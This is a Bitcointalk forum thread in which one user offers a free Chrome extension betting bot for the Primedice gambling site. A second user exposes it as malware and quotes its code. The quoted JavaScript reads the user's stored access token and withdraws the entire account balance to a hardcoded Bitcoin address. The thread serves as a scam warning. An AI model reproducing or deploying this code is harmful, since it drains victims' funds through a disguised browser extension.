Bitcoin Forum
June 22, 2024, 12:04:28 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Warning: One or more bitcointalk.org users have reported that they strongly believe that the creator of this topic is a scammer. (Login to see the detailed trust ratings.) While the bitcointalk.org administration does not verify such claims, you should proceed with extreme caution.
Pages: [1]
  Print  
Author Topic: Dynamic Seed, Swap, Martingale bot for Primedice  (Read 234 times)
louie08 (OP)
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
January 06, 2017, 07:53:15 PM
 #1

I made this google chrome extension for primedice and made decent profits myself. I'm giving this away for free.

https://www.youtube.com/watch?v=0bTUvRUsDpQ

Good luck. Tip me when you win - 15rnFYuBmewoSQ9LCabZ1Zsc2gZAgU3KdM
devans
Sr. Member
****
Offline Offline

Activity: 528
Merit: 368


View Profile
January 06, 2017, 08:42:18 PM
 #2

This is malware and will steal your funds:

Code:
calculate_nonce = function(seed) {
    return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
    calculate_nonce('users/1'), function(seed) {
        var key1 = 'amount'
        var key2 = 'address'
        var load = {};
        load[key1] = seed['user']['balance'];
        load[key2] = '1GPPb1K1AhMMs1bCSEMdphgrF7WLXq7V7S';
        lut['post'](calculate_nonce('withdraw'), load);
    }
);
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!